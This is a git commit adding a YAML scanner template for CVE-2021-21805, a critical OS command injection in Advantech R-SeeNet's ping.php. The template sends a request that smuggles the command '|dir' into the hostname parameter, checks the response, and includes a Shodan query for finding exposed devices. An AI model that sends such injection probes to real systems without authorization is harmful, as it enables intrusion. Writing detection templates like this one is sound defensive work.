Merge pull request #5012 from arafatansari/patch-42

Create CVE-2021-21805.yaml
patch-1
Prince Chaddha 2022-08-05 16:57:16 -07:00 committed by GitHub
commit 63c46aacf8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: CVE-2021-21805
info:
name: Advantech R-SeeNet v 2.4.12 - OS Command Injection
author: arafatansari
severity: critical
description: |
Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
metadata:
verified: true
shodan-query: http.html:"R-SeeNet"
tags: cve,cve2021,rce,r-seenet
requests:
- method: GET
path:
- "{{BaseURL}}/php/ping.php?hostname=|dir"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Ping |dir</title>"
- "bottom.php"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200